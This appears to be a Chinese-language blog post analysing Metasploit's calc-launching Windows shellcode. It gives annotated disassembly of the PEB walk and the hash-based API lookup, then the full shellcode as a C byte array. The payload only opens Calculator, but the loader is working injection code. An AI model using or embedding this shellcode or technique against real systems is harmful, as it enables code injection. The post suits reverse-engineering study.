msf生成弹出calc一段shellcode分析
孟思远
00446000 | FC | cld |
00446001 | E8 82000000 | call shellcodeanalyse.446088 |
00446006 | 60 | pushad |
00446007 | 89E5 | mov ebp,esp | upper stack
00446009 | 31C0 | xor eax,eax | eax:unsigned char * buf
0044600B | 64:8B50 30 | mov edx,dword ptr fs:[eax+30] | PEB
0044600F | 8B52 0C | mov edx,dword ptr ds:[edx+C] | DllList
00446012 | 8B52 14 | mov edx,dword ptr ds:[edx+14] | InMemoryOrderModuleList
00446015 | 8B72 28 | mov esi,dword ptr ds:[edx+28] | Full_DLLNAME_Buffer
00446018 | 0FB74A 26 | movzx ecx,word ptr ds:[edx+26] | MaximumLength
0044601C | 31FF | xor edi,edi | edi:___argv
0044601E | AC | lodsb |
0044601F | 3C 61 | cmp al,61 | upper(ch)
00446021 | 7C 02 | jl shellcodeanalyse.446025 |
00446023 | 2C 20 | sub al,20 |
00446025 | C1CF 0D | ror edi,D | (rotate)res>> 0xD
00446028 | 01C7 | add edi,eax | edi:___argv, eax:unsigned char * buf
0044602A | E2 F2 | loop shellcodeanalyse.44601E |
0044602C | 52 | push edx | edi:hash of(dll name)
0044602D | 57 | push edi | edi:___argv
0044602E | 8B52 10 | mov edx,dword ptr ds:[edx+10] | dllbase
00446031 | 8B4A 3C | mov ecx,dword ptr ds:[edx+3C] | nt_headers
00446034 | 8B4C11 78 | mov ecx,dword ptr ds:[ecx+edx+78] | export_entry
00446038 | E3 48 | jecxz shellcodeanalyse.446082 | jump if ecx==0 judge if export_table is exist
0044603A | 01D1 | add ecx,edx | ecx: export_directory
0044603C | 51 | push ecx |
0044603D | 8B59 20 | mov ebx,dword ptr ds:[ecx+20] |
00446040 | 01D3 | add ebx,edx | ebx:address_of_names
00446042 | 8B49 18 | mov ecx,dword ptr ds:[ecx+18] | ecx:number_of_names
00446045 | E3 3A | jecxz shellcodeanalyse.446081 | judge if no function export by name
00446047 | 49 | dec ecx |
00446048 | 8B348B | mov esi,dword ptr ds:[ebx+ecx*4] | function_name table(releative)
0044604B | 01D6 | add esi,edx | function_name
0044604D | 31FF | xor edi,edi | edi:___argv
0044604F | AC | lodsb |
00446050 | C1CF 0D | ror edi,D | edi:___argv
00446053 | 01C7 | add edi,eax | edi:___argv, eax:unsigned char * buf
00446055 | 38E0 | cmp al,ah |
00446057 | 75 F6 | jne shellcodeanalyse.44604F |
00446059 | 037D F8 | add edi,dword ptr ss:[ebp-8] | edi:hash of(func name)+ hash of(dll name)
0044605C | 3B7D 24 | cmp edi,dword ptr ss:[ebp+24] | if hash_value == target_hash_value
0044605F | 75 E4 | jne shellcodeanalyse.446045 |
00446061 | 58 | pop eax | eax:unsigned char * buf
00446062 | 8B58 24 | mov ebx,dword ptr ds:[eax+24] | eax+24:buf+24
00446065 | 01D3 | add ebx,edx | AddressOfNameOrdinals base
00446067 | 66:8B0C4B | mov cx,word ptr ds:[ebx+ecx*2] | index of function in table
0044606B | 8B58 1C | mov ebx,dword ptr ds:[eax+1C] | eax+1C:buf+1C
0044606E | 01D3 | add ebx,edx | Addres
00446070 | 8B048B | mov eax,dword ptr ds:[ebx+ecx*4] | eax:unsigned char * buf
00446073 | 01D0 | add eax,edx | RealFunctionAddress
00446075 | 894424 24 | mov dword ptr ss:[esp+24],eax | [esp+24]:__acrt_InitializeCriticalSectionEx+5C, eax:unsigned char * buf
00446079 | 5B | pop ebx |
0044607A | 5B | pop ebx |
0044607B | 61 | popad |
0044607C | 59 | pop ecx |
0044607D | 5A | pop edx | edx:_Tlg_Microsoft_CRTProviderProv
0044607E | 51 | push ecx | return_address
0044607F | FFE0 | jmp eax | eax:unsigned char * buf
00446081 | 5F | pop edi | edi:___argv
00446082 | 5F | pop edi | edi:___argv
00446083 | 5A | pop edx | edx:_Tlg_Microsoft_CRTProviderProv
00446084 | 8B12 | mov edx,dword ptr ds:[edx] | edx:_Tlg_Microsoft_CRTProviderProv
00446086 | EB 8D | jmp shellcodeanalyse.446015 |
00446088 | 5D | pop ebp |
00446089 | 6A 01 | push 1 | ShowNormal
0044608B | 8D85 B2000000 | lea eax,dword ptr ss:[ebp+B2] | eax:unsigned char * buf
00446091 | 50 | push eax | str[calc.exe]
00446092 | 68 318B6F87 | push 876F8B31 | (WinExec hash_value)+(kernel32 hash_value)
00446097 | FFD5 | call ebp | WinExec
00446099 | BB F0B5A256 | mov ebx,56A2B5F0 | (ExitProcess hash_value)+(kernel32 hash_value)
0044609E | 68 A695BD9D | push 9DBD95A6 | (GetVersion hash_value)+(kernel32 hash_value)
004460A3 | FFD5 | call ebp | GetVersion
004460A5 | 3C 06 | cmp al,6 |
004460A7 | 7C 0A | jl shellcodeanalyse.4460B3 | if(GetVersion()<6)
004460A9 | 80FB E0 | cmp bl,E0 |
004460AC | 75 05 | jne shellcodeanalyse.4460B3 |
004460AE | BB 4713726F | mov ebx,6F721347 | OldVersion's(ExitProcess hash_value)
004460B3 | 6A 00 | push 0 |
004460B5 | 53 | push ebx |
004460B6 | FFD5 | call ebp | ExitProcess
004460B8 | 63 | ascii c |
004460B9 | 61 | ascii a |
004460BA | 6C | ascii l |
004460BB | 63 | ascii c |
004460BC | 2E | ascii . |
004460BD | 65 | ascii e |
004460BE | 78 | ascii x |
004460BF | 65 | ascii e |
004460C0 | 00 | ascii \0 |
004460C1 | 00 | ascii \0 |
原shellcode:
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
类似资料: